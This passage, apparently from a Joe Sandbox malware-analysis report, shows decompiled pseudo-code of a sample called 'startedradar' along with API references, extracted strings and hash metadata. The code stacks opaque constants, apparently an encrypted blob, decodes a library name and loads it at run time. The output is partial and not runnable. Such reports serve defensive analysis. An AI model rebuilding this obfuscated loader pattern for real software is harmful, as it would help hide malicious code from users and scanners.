				 *((intOrPtr*)(_t284 - 0x250)) = 0x7f79a4ac;
				 *((intOrPtr*)(_t284 - 0x24c)) = 0xdc5b77cf;
				 *((intOrPtr*)(_t284 - 0x248)) = 0x25da523d;
				 *((intOrPtr*)(_t284 - 0x244)) = 0xe0d312fe;
				 *((intOrPtr*)(_t284 - 0x240)) = 0xd2dff747;
				 *((intOrPtr*)(_t284 - 0x23c)) = 0x7022095;
				 *((intOrPtr*)(_t284 - 0x238)) = 0x719a7b0b;
				 *((intOrPtr*)(_t284 - 0x234)) = 0x7970fd46;
				 *((intOrPtr*)(_t284 - 0x230)) = 0x15b2d04a;
				 *((intOrPtr*)(_t284 - 0x22c)) = 0xcc3b50c3;
				 *((intOrPtr*)(_t284 - 0x228)) = 0x5d96658a;
				 *((intOrPtr*)(_t284 - 0x224)) = 0x5091a0a8;
				 *((intOrPtr*)(_t284 - 0x220)) = 0xab518f9;
				 *((intOrPtr*)(_t284 - 0x21c)) = 0x4f751827;
				 *((intOrPtr*)(_t284 - 0x218)) = 0x947dd9aa;
				 *((intOrPtr*)(_t284 - 0x214)) = 0xbfbbb83e;
				 *((intOrPtr*)(_t284 - 0x210)) = 0x3b76d3f;
				 *((intOrPtr*)(_t284 - 0x20c)) = 0xf9878d9d;
				 *((intOrPtr*)(_t284 - 0x208)) = 0xf8ea9dae;
				 *((intOrPtr*)(_t284 - 0x204)) = 0x6133bef0;
				 *((intOrPtr*)(_t284 - 0x200)) = 0x76e6f97b;
				 *((intOrPtr*)(_t284 - 0x1fc)) = 0x5e025c72;
				 *((intOrPtr*)(_t284 - 0x1f8)) = 0x4752fe5;
				 *((intOrPtr*)(_t284 - 0x1f4)) = 0xfdcd733f;
				 *((intOrPtr*)(_t284 - 0x1f0)) = 0xcbbf6b7e;
				 *((intOrPtr*)(_t284 - 0x1ec)) = 0xf32a2264;
				 *((intOrPtr*)(_t284 - 0x1e8)) = 0xbec1ac14;
				 *((intOrPtr*)(_t284 - 0x1e4)) = 0x9f1483c4;
				 *((intOrPtr*)(_t284 - 0x1e0)) = 0x92065933;
				 *((intOrPtr*)(_t284 - 0x1dc)) = 0x51ff9fa1;
				 *((intOrPtr*)(_t284 - 0x1d8)) = 0x625a13b4;
				 *((intOrPtr*)(_t284 - 0x1d4)) = 0x2ded854;
				 *((intOrPtr*)(_t284 - 0x1d0)) = 0xb6117717;
				 *((intOrPtr*)(_t284 - 0x1cc)) = 0x91e781f9;
				 *((intOrPtr*)(_t284 - 0x1c8)) = 0xcd6f92f7;
				 *((intOrPtr*)(_t284 - 0x1c4)) = 0x87a2363d;
				 *((intOrPtr*)(_t284 - 0x1c0)) = 0x13b8268e;
				 *((intOrPtr*)(_t284 - 0x1bc)) = 0x2580013;
				 *((intOrPtr*)(_t284 - 0x1b8)) = 0x5ecdb453;
				 *((intOrPtr*)(_t284 - 0x1b4)) = 0x34b5737;
				 *((intOrPtr*)(_t284 - 0x1b0)) = 0xab27928e;
				 *((intOrPtr*)(_t284 - 0x1ac)) = 0x332b8ed3;
				 *((intOrPtr*)(_t284 - 0x1a8)) = 0x7f922841;
				 *((intOrPtr*)(_t284 - 0x1a4)) = 0x7e650469;
				 *((intOrPtr*)(_t284 - 0x1a0)) = 0xd5cf8ddc;
				 *((intOrPtr*)(_t284 - 0x19c)) = 0xf2a7d7c;
				 *((intOrPtr*)(_t284 - 0x198)) = 0x139aa2bd;
				 *((intOrPtr*)(_t284 - 0x194)) = 0x180a5291;
				 *((intOrPtr*)(_t284 - 0x190)) = 0xab8c0cb8;
				 *((intOrPtr*)(_t284 - 0x18c)) = 0xea542bff;
				 *((intOrPtr*)(_t284 - 0x188)) = 0xc0c12a40;
				 *((intOrPtr*)(_t284 - 0x184)) = 0xb850ac98;
				 *((intOrPtr*)(_t284 - 0x180)) = 0x1bf805ad;
				 *((intOrPtr*)(_t284 - 0x17c)) = 0x7907e523;
				 *((intOrPtr*)(_t284 - 0x178)) = 0xe8c03c27;
				 *((intOrPtr*)(_t284 - 0x174)) = 0x85cd6441;
				 *((intOrPtr*)(_t284 - 0x170)) = 0xc7d5e05c;
				 *((intOrPtr*)(_t284 - 0x16c)) = 0xc3189a81;
				 *((intOrPtr*)(_t284 - 0x168)) = 0x479f2e5f;
				 *((intOrPtr*)(_t284 - 0x164)) = 0x6c3275b5;
				 *((intOrPtr*)(_t284 - 0x160)) = 0x965b94c0;
				 *((intOrPtr*)(_t284 - 0x15c)) = 0x79db8e5e;
				 *((intOrPtr*)(_t284 - 0x158)) = 0x9963eb1a;
				 *((intOrPtr*)(_t284 - 0x154)) = 0x566b7606;
				 *((intOrPtr*)(_t284 - 0x150)) = 0x34268710;
				 *((intOrPtr*)(_t284 - 0x14c)) = 0xb16c33fb;
				 *((intOrPtr*)(_t284 - 0x148)) = 0xa9e70d08;
				 *((intOrPtr*)(_t284 - 0x144)) = 0xa4f0ba81;
				 *((intOrPtr*)(_t284 - 0x140)) = 0x5dbef4f;
				 *((intOrPtr*)(_t284 - 0x13c)) = 0x186f7a9e;
				 *((intOrPtr*)(_t284 - 0x138)) = 0x6189fd9a;
				 *((intOrPtr*)(_t284 - 0x134)) = 0x88407b08;
				 *((intOrPtr*)(_t284 - 0x130)) = 0x3153193f;
				 *((intOrPtr*)(_t284 - 0x12c)) = 0x67230cd3;
				 *((intOrPtr*)(_t284 - 0x128)) = 0x5fd0a1fe;
				 *((intOrPtr*)(_t284 - 0x124)) = 0x356453bb;
				 *((intOrPtr*)(_t284 - 0x120)) = 0x7c6cf28b;
				 *((intOrPtr*)(_t284 - 0x11c)) = 0xca12322b;
				 *((intOrPtr*)(_t284 - 0x118)) = 0x3ffcc3c2;
				 *((intOrPtr*)(_t284 - 0x114)) = 0x442ea63e;
				 *((intOrPtr*)(_t284 - 0x110)) = 0xef0f8a02;
				 *((intOrPtr*)(_t284 - 0x10c)) = 0xa1aadcfb;
				 *((intOrPtr*)(_t284 - 0x108)) = 0x97db4dc8;
				 *((intOrPtr*)(_t284 - 0x104)) = 0xb5745228;
				 *((intOrPtr*)(_t284 - 0x100)) = 0x92edbdaf;
				 *((intOrPtr*)(_t284 - 0xfc)) = 0x3d612b8;
				 *((intOrPtr*)(_t284 - 0xf8)) = 0x2acb5d86;
				 *((intOrPtr*)(_t284 - 0xf4)) = 0xb378ebbf;
				 *((intOrPtr*)(_t284 - 0xf0)) = 0x888f56a5;
				 *((intOrPtr*)(_t284 - 0xec)) = 0xb44281f4;
				 *((intOrPtr*)(_t284 - 0xe8)) = 0x1e5aefa2;
				 *((intOrPtr*)(_t284 - 0xe4)) = 0xe64825e9;
				 *((intOrPtr*)(_t284 - 0xe0)) = 0x8648df89;
				 *((intOrPtr*)(_t284 - 0xdc)) = 0x115ea883;
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x3af74aa7;
				 *((intOrPtr*)(_t284 - 0xd4)) = 0x202a9a87;
				 *((intOrPtr*)(_t284 - 0xd0)) = 0xbf893e19;
				 *((intOrPtr*)(_t284 - 0xcc)) = 0x69d7038c;
				 *((intOrPtr*)(_t284 - 0xc8)) = 0x7c71740b;
				 *((intOrPtr*)(_t284 - 0xc4)) = 0xc7ccad21;
				 *((intOrPtr*)(_t284 - 0xc0)) = 0xee01f4da;
				 *((intOrPtr*)(_t284 - 0xbc)) = 0x68406b5e;
				 *((intOrPtr*)(_t284 - 0xb8)) = 0x93566171;
				 *((intOrPtr*)(_t284 - 0xb4)) = 0xbc3b2234;
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x6f738a8f;
				 *((intOrPtr*)(_t284 - 0xac)) = 0x924d71cd;
				 *((intOrPtr*)(_t284 - 0xa8)) = 0xccae1042;
				 *((intOrPtr*)(_t284 - 0xa4)) = 0x6b902c01;
				 *((intOrPtr*)(_t284 - 0xa0)) = 0xdaaf197b;
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x5e5aebef;
				 *((intOrPtr*)(_t284 - 0x98)) = 0x8fb5e58c;
				 *((intOrPtr*)(_t284 - 0x94)) = 0xf5fe6f7e;
				 *((intOrPtr*)(_t284 - 0x90)) = 0xc7957f25;
				 *((intOrPtr*)(_t284 - 0x8c)) = 0x7c49cf4e;
				 *((intOrPtr*)(_t284 - 0x88)) = 0x6a7edd29;
				 *((intOrPtr*)(_t284 - 0x84)) = 0x30389426;
				 *((intOrPtr*)(_t284 - 0x80)) = 0xb39b1eb;
				 *((intOrPtr*)(_t284 - 0x7c)) = 0x32da1600;
				 *((intOrPtr*)(_t284 - 0x78)) = 0xdc7fb1ae;
				 *((intOrPtr*)(_t284 - 0x74)) = 0x2337eb3c;
				 *((intOrPtr*)(_t284 - 0x70)) = 0xafd2921b;
				 *((intOrPtr*)(_t284 - 0x6c)) = 0x51dd5891;
				 *((intOrPtr*)(_t284 - 0x68)) = 0xacc11b49;
				 *((intOrPtr*)(_t284 - 0x64)) = 0x23a45974;
				 *((intOrPtr*)(_t284 - 0x60)) = 0x832c3c3f;
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x562f46e;
				 *((intOrPtr*)(_t284 - 0x58)) = 0xba5bcd86;
				 *((intOrPtr*)(_t284 - 0x54)) = 0x7359cfcf;
				 *((intOrPtr*)(_t284 - 0x50)) = 0xcabec7c;
				 *((intOrPtr*)(_t284 - 0x4c)) = 0x9697f9c0;
				 *((intOrPtr*)(_t284 - 0x48)) = 0x35db867b;
				 *((intOrPtr*)(_t284 - 0x44)) = 0xa97d7963;
				 *((intOrPtr*)(_t284 - 0x40)) = 0x147bfba5;
				 *((intOrPtr*)(_t284 - 0x3c)) = 0x2596c387;
				 *((intOrPtr*)(_t284 - 0x38)) = 0x7ee5d084;
				 *((intOrPtr*)(_t284 - 0x34)) = 0x8c122eb4;
				 *((intOrPtr*)(_t284 - 0x30)) = 0x5766d9df;
				 *((intOrPtr*)(_t284 - 0x2c)) = 0x4d281f85;
				 *((intOrPtr*)(_t284 - 0x28)) = 0x2062f8bf;
				 *((intOrPtr*)(_t284 - 0x24)) = 0xfb193eb3;
				 *((intOrPtr*)(_t284 - 0x20)) = 0x64e2007f;
				 *((intOrPtr*)(_t284 - 0x1c)) = 0x377c16ec;
				 *((intOrPtr*)(_t284 - 0x18)) = 0x98aeaae7;
				 *((intOrPtr*)(_t284 - 0x14)) = 0xcfe1fba1;
				 *((intOrPtr*)(_t284 - 0x10)) = 0xd5013e25;
				 *((intOrPtr*)(_t284 - 0xc)) = 0x145b8804;
				 *((intOrPtr*)(_t284 - 8)) = 0xdc6b19a2;
				 *((intOrPtr*)(_t284 - 4)) = 0xd0c5ad00;
				_t282 = L002A1D00(0x2b31f0, 0x1a0, _t280);
				 *0x2b7c84 = LoadLibraryW(_t282);
				_t273 = HeapFree(GetProcessHeap(), 0, _t282);
				_t277 =  *0x2b7c84;
				_t283 = 0x1f5c6a;
				if( *0x2b7c84 != 0) {
					goto 0x5a17a4;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L002A1480(_t275, _t277, _t284 - 0x430, _t280, _t283);
				} else {
					goto 0x5a1791;
					return _t273;
				}
			}

0x002a8b2a
0x002a8b34
0x002a8b3e
0x002a8b48
0x002a8b52
0x002a8b5c
0x002a8b66
0x002a8b70
0x002a8b7a
0x002a8b84
0x002a8b8e
0x002a8b98
0x002a8ba2
0x002a8bac
0x002a8bb6
0x002a8bc0
0x002a8bca
0x002a8bd4
0x002a8bde
0x002a8be8
0x002a8bf2
0x002a8bfc
0x002a8c06
0x002a8c10
0x002a8c1a
0x002a8c24
0x002a8c2e
0x002a8c38
0x002a8c42
0x002a8c4c
0x002a8c56
0x002a8c60
0x002a8c6a
0x002a8c74
0x002a8c7e
0x002a8c88
0x002a8c92
0x002a8c9c
0x002a8ca6
0x002a8cb0
0x002a8cba
0x002a8cc4
0x002a8cce
0x002a8cd8
0x002a8ce2
0x002a8cec
0x002a8cf6
0x002a8d00
0x002a8d0a
0x002a8d14
0x002a8d1e
0x002a8d28
0x002a8d32
0x002a8d3c
0x002a8d46
0x002a8d50
0x002a8d5a
0x002a8d64
0x002a8d6e
0x002a8d78
0x002a8d82
0x002a8d8c
0x002a8d96
0x002a8da0
0x002a8daa
0x002a8db4
0x002a8dbe
0x002a8dc8
0x002a8dd2
0x002a8ddc
0x002a8de6
0x002a8df0
0x002a8dfa
0x002a8e04
0x002a8e0e
0x002a8e18
0x002a8e22
0x002a8e2c
0x002a8e36
0x002a8e40
0x002a8e4a
0x002a8e54
0x002a8e5e
0x002a8e68
0x002a8e72
0x002a8e7c
0x002a8e86
0x002a8e90
0x002a8e9a
0x002a8ea4
0x002a8eae
0x002a8eb8
0x002a8ec2
0x002a8ecc
0x002a8ed6
0x002a8ee0
0x002a8eea
0x002a8ef4
0x002a8efe
0x002a8f08
0x002a8f12
0x002a8f1c
0x002a8f26
0x002a8f30
0x002a8f3a
0x002a8f44
0x002a8f4e
0x002a8f58
0x002a8f62
0x002a8f6c
0x002a8f76
0x002a8f80
0x002a8f8a
0x002a8f94
0x002a8f9e
0x002a8fa8
0x002a8fb2
0x002a8fbc
0x002a8fc6
0x002a8fd0
0x002a8fda
0x002a8fe4
0x002a8fee
0x002a8ff8
0x002a9002
0x002a900c
0x002a9016
0x002a9020
0x002a902a
0x002a9034
0x002a903e
0x002a9048
0x002a9052
0x002a905c
0x002a9066
0x002a9070
0x002a907a
0x002a9084
0x002a908e
0x002a9098
0x002a90a2
0x002a90ac
0x002a90b6
0x002a90c0
0x002a90ca
0x002a90d4
0x002a90de
0x002a90e8
0x002a90f2
0x002a90fc
0x002a9106
0x002a9110
0x002a911a
0x002a9124
0x002a912e
0x002a9138
0x002a9142
0x002a914c
0x002a9156
0x002a9160
0x002a916a
0x002a9174
0x002a917e
0x002a9188
0x002a9192
0x002a919c
0x002a91a6
0x002a91b0
0x002a91ba
0x002a91c4
0x002a91ce
0x002a91d8
0x002a91e2
0x002a91ec
0x002a91f6
0x002a9200
0x002a920a
0x002a9214
0x002a921e
0x002a9228
0x002a9232
0x002a923c
0x002a9246
0x002a9250
0x002a925a
0x002a9264
0x002a926e
0x002a9278
0x002a9282
0x002a928c
0x002a9296
0x002a92a0
0x002a92aa
0x002a92b4
0x002a92be
0x002a92c8
0x002a92d2
0x002a92dc
0x002a92e6
0x002a92f0
0x002a92fa
0x002a9304
0x002a930e
0x002a9318
0x002a9322
0x002a932c
0x002a9336
0x002a9340
0x002a934a
0x002a9354
0x002a935e
0x002a9368
0x002a9372
0x002a937c
0x002a9386
0x002a9390
0x002a939a
0x002a93a4
0x002a93ae
0x002a93b8
0x002a93c2
0x002a93cc
0x002a93d6
0x002a93e0
0x002a93ea
0x002a93f4
0x002a93fe
0x002a9408
0x002a9412
0x002a941c
0x002a9426
0x002a9430
0x002a943a
0x002a9444
0x002a944e
0x002a9458
0x002a9462
0x002a9469
0x002a9470
0x002a9477
0x002a947e
0x002a9485
0x002a9496
0x002a94a2
0x002a94a9
0x002a94b0
0x002a94b7
0x002a94be
0x002a94c5
0x002a94cc
0x002a94d3
0x002a94da
0x002a94e1
0x002a94e8
0x002a94ef
0x002a94f6
0x002a94fd
0x002a9504
0x002a950b
0x002a9512
0x002a9519
0x002a9520
0x002a9527
0x002a952e
0x002a9535
0x002a953c
0x002a9543
0x002a954a
0x002a9559
0x002a9565
0x002a9571
0x002a9577
0x002a957d
0x002a9580
0x002a9588
0x002a958d
0x002a958e
0x002a958f
0x002a9590
0x002a9591
0x002a9592
0x002a9593
0x002a9594
0x002a9595
0x002a9596
0x002a95a8
0x002a9582
0x002a9582
0x002a9587
0x002a9587

APIs

LoadLibraryW.KERNEL32(00000000), ref: 002A955C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A956A
HeapFree.KERNEL32(00000000), ref: 002A9571

Strings

<7#, xrefs: 002A9477
<0DR, xrefs: 002A8DFA
M`pO, xrefs: 002A8CEC
%H, xrefs: 002A9368
Z, xrefs: 002A8C9C
^k@h, xrefs: 002A93CC
Z^, xrefs: 002A941C
k0, xrefs: 002A8C7E
[!N, xrefs: 002A8B3E
s%, xrefs: 002A8DF0

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: k0$<0DR$<7#$M`pO$Z$^k@h$%H$[!N$s%$Z^
API String ID: 872250060-2301064221
Opcode ID: a9bc290213de5ccae6767ce6809fc5538a3741fa36cb4dfe98095c39ed267b94
Instruction ID: c775dedb5dc8775f8ba026896d9ec805f833ea4912c78e1d40359df2c4813373
Opcode Fuzzy Hash: a9bc290213de5ccae6767ce6809fc5538a3741fa36cb4dfe98095c39ed267b94
Instruction Fuzzy Hash: 6222C7B48163A9CBDB61DF8299897CDBB74FB11344F6086C8D1593B215CB750B82CF89

Uniqueness

Uniqueness Score: 100.00%

Function 002A24B6, Relevance: 15.1, APIs: 10, Instructions: 102
memorystringCOMMON

C-Code - Quality: 36%

			E002A24B6(int __ecx) {
				long* _t25;
				short* _t29;
				void* _t30;
				int _t46;
				int _t48;
				void* _t50;
				void* _t51;
				long* _t55;
				int _t59;
				signed int _t61;
				void* _t63;
				void* _t65;
				long _t66;
				WCHAR* _t68;
				void* _t69;

				 *(_t69 - 8) = 0;
				_t48 = 0;
				 *(_t69 - 0xc) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_t25 = __ecx + 4;
				_t59 = 0;
				 *(_t69 - 0x10) = _t25;
				 *_t25 = 0;
				L002A1BE0(0x2a2410, _t69 - 8);
				_t63 =  *(_t69 - 8);
				while(_t63 != 0) {
					_t6 = _t63 + 4; // 0x4
					_t46 = lstrlenW(_t6);
					_t63 =  *_t63;
					_t48 = _t48 + 1 + _t46;
				}
				_t29 = RtlAllocateHeap(GetProcessHeap(), 8, _t48 + _t48);
				 *(_t69 - 4) = _t29;
				if(_t29 == 0) {
					_t59 =  *(_t69 - 0xc);
				} else {
					_t50 =  *(_t69 - 8);
					while(_t50 != 0) {
						_t10 = _t50 + 4; // 0x4
						_t68 = _t10;
						lstrcpyW( &(_t29[_t59]), _t68);
						_t61 = _t59 + lstrlenW(_t68);
						_t29 =  *(_t69 - 4);
						_t29[_t61] = 0x2c;
						_t59 = _t61 + 1;
						_t50 =  *_t50;
					}
					_t51 = 0;
					_t66 = WideCharToMultiByte(0xfde9, 0, _t29, _t59, 0, 0, 0, 0);
					 *(_t69 - 0x14) = _t66;
					if(_t66 != 0) {
						_t51 = RtlAllocateHeap(GetProcessHeap(), 8, _t66);
						if(_t51 == 0) {
							goto L11;
						} else {
							goto 0x5a0916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t55 =  *(_t69 - 0x10);
							if(_t55 != 0) {
								 *_t55 =  *(_t69 - 0x14);
							}
						}
					}
					goto 0x5a0936;
					asm("int3");
					 *_t59 = _t51;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t30 =  *(_t69 - 8);
				if(_t30 != 0) {
					do {
						_t65 =  *_t30;
						HeapFree(GetProcessHeap(), 0, _t30);
						_t30 = _t65;
					} while (_t65 != 0);
				}
				return 0 |  *_t59 != 0x00000000;
			}

0x002a24b8
0x002a24c0
0x002a24c2
0x002a24c6
0x002a24cb
0x002a24d4
0x002a24d6
0x002a24d9
0x002a24db
0x002a24e0
0x002a24e5
0x002a24f0
0x002a24f4
0x002a24fa
0x002a24fd
0x002a24ff
0x002a2510
0x002a2516
0x002a251b
0x002a25c5
0x002a2521
0x002a2521
0x002a2526
0x002a2528
0x002a2528
0x002a2530
0x002a253d
0x002a2544
0x002a2547
0x002a254b
0x002a254c
0x002a254e
0x002a2552
0x002a2566
0x002a2568
0x002a256d
0x002a257f
0x002a2583
0x00000000
0x002a2585
0x002a2585
0x002a258a
0x002a258b
0x002a258c
0x002a258d
0x002a258e
0x002a258f
0x002a2590
0x002a2591
0x002a2592
0x002a2593
0x002a2594
0x002a2595
0x002a2596
0x002a2597
0x002a259d
0x002a25a2
0x002a25a7
0x002a25a7
0x002a25a2
0x002a2583
0x002a25ae
0x002a25b3
0x002a25b4
0x002a25bd
0x002a25bd
0x002a25c8
0x002a25cd
0x002a25d0
0x002a25d0
0x002a25dc
0x002a25e2
0x002a25e4
0x002a25d0
0x002a25f5

APIs

lstrlenW.KERNEL32(00000004), ref: 002A24F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A2509
RtlAllocateHeap.NTDLL(00000000), ref: 002A2510
lstrcpyW.KERNEL32(00000000,00000004), ref: 002A2530
lstrlenW.KERNEL32(00000004), ref: 002A2537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002A2560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A2572
RtlAllocateHeap.NTDLL(00000000), ref: 002A2579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A25D5
HeapFree.KERNEL32(00000000), ref: 002A25DC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: c632822e3d46bf722e98b915341d8484e7647df21865f65fc0895b535e391804
Instruction ID: c26c04c4fd2b4478c71006de049f2f4c917ddb5acbca811b65a9334620005197
Opcode Fuzzy Hash: c632822e3d46bf722e98b915341d8484e7647df21865f65fc0895b535e391804
Instruction Fuzzy Hash: 52319E71A11325EFDB209FE8EC88B6EBBBCFF49704B450565E905EB240DB709D048BA0

Uniqueness

Uniqueness Score: 1.85%

Function 002A6BAA, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167
memorylibraryUNIQUE

C-Code - Quality: 92%

			E002A6BAA(void* __esi, void* __eflags) {
				int _t152;
				void* _t154;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				 *((intOrPtr*)(_t163 - 0x24c)) = 0x71744fb1;
				 *((intOrPtr*)(_t163 - 0x248)) = 0x45d6f7ed;
				 *((intOrPtr*)(_t163 - 0x244)) = 0x8dff7e89;
				 *((intOrPtr*)(_t163 - 0x240)) = 0x7ffd7be0;
				 *((intOrPtr*)(_t163 - 0x23c)) = 0x9fdeeae2;
				 *((intOrPtr*)(_t163 - 0x238)) = 0x786d5615;
				 *((intOrPtr*)(_t163 - 0x234)) = 0x604ea1f7;
				 *((intOrPtr*)(_t163 - 0x230)) = 0x411f1ad5;
				 *((intOrPtr*)(_t163 - 0x22c)) = 0xa612af75;
				 *((intOrPtr*)(_t163 - 0x228)) = 0x35c83646;
				 *((intOrPtr*)(_t163 - 0x224)) = 0xda68584a;
				 *((intOrPtr*)(_t163 - 0x220)) = 0xf9c4ef99;
				 *((intOrPtr*)(_t163 - 0x21c)) = 0x1ffb17c6;
				 *((intOrPtr*)(_t163 - 0x218)) = 0x2a559a64;
				 *((intOrPtr*)(_t163 - 0x214)) = 0x349ee742;
				 *((intOrPtr*)(_t163 - 0x210)) = 0x4a11520f;
				 *((intOrPtr*)(_t163 - 0x20c)) = 0x1b55063a;
				 *((intOrPtr*)(_t163 - 0x208)) = 0x1fbc74ec;
				 *((intOrPtr*)(_t163 - 0x204)) = 0x8afa589d;
				 *((intOrPtr*)(_t163 - 0x200)) = 0xe126f3ae;
				 *((intOrPtr*)(_t163 - 0x1fc)) = 0x1298effd;
				 *((intOrPtr*)(_t163 - 0x1f8)) = 0x551a0a77;
				 *((intOrPtr*)(_t163 - 0x1f4)) = 0x1eb6f591;
				 *((intOrPtr*)(_t163 - 0x1f0)) = 0xc744f596;
				 *((intOrPtr*)(_t163 - 0x1ec)) = 0x2d03d841;
				 *((intOrPtr*)(_t163 - 0x1e8)) = 0x748f9909;
				 *((intOrPtr*)(_t163 - 0x1e4)) = 0x6f96c2cf;
				 *((intOrPtr*)(_t163 - 0x1e0)) = 0xda278cdd;
				 *((intOrPtr*)(_t163 - 0x1dc)) = 0x4b1980d2;
				 *((intOrPtr*)(_t163 - 0x1d8)) = 0xb6d4c647;
				 *((intOrPtr*)(_t163 - 0x1d4)) = 0x6e4a8f8c;
				 *((intOrPtr*)(_t163 - 0x1d0)) = 0x806b9650;
				 *((intOrPtr*)(_t163 - 0x1cc)) = 0xb1bcf103;
				 *((intOrPtr*)(_t163 - 0x1c8)) = 0x74c5c597;
				 *((intOrPtr*)(_t163 - 0x1c4)) = 0xdfc78e4f;
				 *((intOrPtr*)(_t163 - 0x1c0)) = 0x58f7a652;
				 *((intOrPtr*)(_t163 - 0x1bc)) = 0xb120ea26;
				 *((intOrPtr*)(_t163 - 0x1b8)) = 0xfcfae165;
				 *((intOrPtr*)(_t163 - 0x1b4)) = 0x3808541e;
				 *((intOrPtr*)(_t163 - 0x1b0)) = 0x955dd695;
				 *((intOrPtr*)(_t163 - 0x1ac)) = 0x9ecdac3a;
				 *((intOrPtr*)(_t163 - 0x1a8)) = 0x8ed5f281;
				 *((intOrPtr*)(_t163 - 0x1a4)) = 0x6bdaf004;
				 *((intOrPtr*)(_t163 - 0x1a0)) = 0xb3361c8c;
				 *((intOrPtr*)(_t163 - 0x19c)) = 0x83fe0156;
				 *((intOrPtr*)(_t163 - 0x198)) = 0x60152a13;
				 *((intOrPtr*)(_t163 - 0x194)) = 0x21a109a0;
				 *((intOrPtr*)(_t163 - 0x190)) = 0xae50f5aa;
				 *((intOrPtr*)(_t163 - 0x18c)) = 0xe5d42415;
				 *((intOrPtr*)(_t163 - 0x188)) = 0xff326d0f;
				 *((intOrPtr*)(_t163 - 0x184)) = 0x33dc58fa;
				 *((intOrPtr*)(_t163 - 0x180)) = 0xd788fcbe;
				 *((intOrPtr*)(_t163 - 0x17c)) = 0x52185b40;
				 *((intOrPtr*)(_t163 - 0x178)) = 0x40a35bee;
				 *((intOrPtr*)(_t163 - 0x174)) = 0x2a5f460b;
				 *((intOrPtr*)(_t163 - 0x170)) = 0x32ba9a31;
				 *((intOrPtr*)(_t163 - 0x16c)) = 0xca034b44;
				 *((intOrPtr*)(_t163 - 0x168)) = 0x54132d4f;
				 *((intOrPtr*)(_t163 - 0x164)) = 0x91ae1d70;
				 *((intOrPtr*)(_t163 - 0x160)) = 0x7ac24f93;
				 *((intOrPtr*)(_t163 - 0x15c)) = 0xf37f4232;
				 *((intOrPtr*)(_t163 - 0x158)) = 0xa6615044;
				 *((intOrPtr*)(_t163 - 0x154)) = 0xc47febf8;
				 *((intOrPtr*)(_t163 - 0x150)) = 0xb29e162d;
				 *((intOrPtr*)(_t163 - 0x14c)) = 0x21378b1c;
				 *((intOrPtr*)(_t163 - 0x148)) = 0x78a5ce5c;
				 *((intOrPtr*)(_t163 - 0x144)) = 0x61bc1d21;
				 *((intOrPtr*)(_t163 - 0x140)) = 0xea2ecede;
				 *((intOrPtr*)(_t163 - 0x13c)) = 0xa791dede;
				 *((intOrPtr*)(_t163 - 0x138)) = 0xa7887afd;
				 *((intOrPtr*)(_t163 - 0x134)) = 0xe171ecb5;
				 *((intOrPtr*)(_t163 - 0x130)) = 0xce33962f;
				 *((intOrPtr*)(_t163 - 0x12c)) = 0xb256e05d;
				 *((intOrPtr*)(_t163 - 0x128)) = 0xa0cac220;
				 *((intOrPtr*)(_t163 - 0x124)) = 0xee34e364;
				 *((intOrPtr*)(_t163 - 0x120)) = 0x6e140336;
				 *((intOrPtr*)(_t163 - 0x11c)) = 0x60420845;
				 *((intOrPtr*)(_t163 - 0x118)) = 0x9392cfe6;
				 *((intOrPtr*)(_t163 - 0x114)) = 0x5f5c3139;
				 *((intOrPtr*)(_t163 - 0x110)) = 0x81289ce0;
				 *((intOrPtr*)(_t163 - 0x10c)) = 0x36617698;
				 *((intOrPtr*)(_t163 - 0x108)) = 0x64028be8;
				 *((intOrPtr*)(_t163 - 0x104)) = 0x3b8df82c;
				 *((intOrPtr*)(_t163 - 0x100)) = 0xf98f5a76;
				 *((intOrPtr*)(_t163 - 0xfc)) = 0x7e1fec4c;
				 *((intOrPtr*)(_t163 - 0xf8)) = 0x42677be5;
				 *((intOrPtr*)(_t163 - 0xf4)) = 0xc60b584c;
				 *((intOrPtr*)(_t163 - 0xf0)) = 0x5fcd2f06;
				 *((intOrPtr*)(_t163 - 0xec)) = 0xf8cbcfec;
				 *((intOrPtr*)(_t163 - 0xe8)) = 0xe5761a4b;
				 *((intOrPtr*)(_t163 - 0xe4)) = 0x7e5f1912;
				 *((intOrPtr*)(_t163 - 0xe0)) = 0x4566e5df;
				 *((intOrPtr*)(_t163 - 0xdc)) = 0x31d3fc58;
				 *((intOrPtr*)(_t163 - 0xd8)) = 0x42ad45b1;
				 *((intOrPtr*)(_t163 - 0xd4)) = 0x26c6e81f;
				 *((intOrPtr*)(_t163 - 0xd0)) = 0x8c35f216;
				 *((intOrPtr*)(_t163 - 0xcc)) = 0xc57f604d;
